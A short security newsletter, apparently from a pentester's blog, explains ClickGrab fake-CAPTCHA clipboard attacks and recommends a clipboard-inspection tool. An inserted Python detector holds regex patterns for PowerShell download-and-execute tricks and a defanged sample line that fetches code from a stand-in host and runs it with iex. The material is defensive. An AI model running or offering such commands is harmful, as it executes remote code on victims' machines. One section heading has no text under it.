Admin due diligence crushes ClickGrab tricks.
Ethical Threat Insight: How to Spot and Stop ClickGrab Attacks
ClickGrab isn’t just about tricking users, it’s about tricking you, the admin.
The ClickGrab technique is super tricky because of the fake-CAPTCHA pages. The technique is centered around hijacking your clipboard with malicious PowerShell commands and then tricking you into pasting the malicious commands into the Run dialog.
But there is hope! PasteEater is a super cool utility that lets you inspect clipboard content and catch hidden malicious commands before they run.
How the attack typically plays out:
How to learn more about this nasty attack? Check out these awesome resources by Michael Haag and William Metcalf.
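
The kind of clipboard check described above, as an added example that is not part of the original newsletter and is not PasteEater's code: a heuristic inspector that scores clipboard text before it reaches the Run dialog. The indicator list, the verdict names and the sample strings are assumptions constructed for illustration.

```python
import base64
import re

# Heuristic indicators: assumptions for this example, not PasteEater's rules.
INDICATORS = {
    "interpreter": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    "download_exec": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "captcha_lure": re.compile(r"robot|captcha|verif", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_encoded_command(text):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand, or ''."""
    match = ENCODED.search(text)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return ""

def inspect_clipboard(text):
    """Return (verdict, sorted indicator names) for one clipboard string."""
    # Scan the decoded payload too, so encoding does not hide the indicators.
    expanded = text + "\n" + decode_encoded_command(text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(expanded)]
    if ENCODED.search(text):
        hits.append("encoded_command")
    hits.sort()
    # An interpreter call plus any second indicator should never reach Win+R.
    if "interpreter" in hits and len(hits) >= 2:
        return "block", hits
    return ("review" if hits else "allow"), hits

# Constructed samples (defanged; example.invalid does not resolve).
SAMPLES = {
    "plain_text": "Meeting moved to 3pm, room 204",
    "fake_captcha": 'powershell -w hidden -c "iwr https://example.invalid/a | iex"'
                    " # I am not a robot: verification ID 4821",
    "encoded": "powershell -enc " + base64.b64encode(
        "Invoke-Expression 'constructed sample'".encode("utf-16-le")).decode(),
}

if __name__ == "__main__":
    for name, clip in SAMPLES.items():
        print(name, *inspect_clipboard(clip))
```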
p.s. - when trusting your clipboard backfires…🙃
All the best
"Spirit of a hacker heart of a defender"
Pentester/recovering sysadmin
Self-proclaimed Ethical Threat
Active Directory Security Connoisseur
Offensive stuff — securit360.com
Host Cyber Threat POV — offsec.blog
SWAG — swag.ethicalthreat.com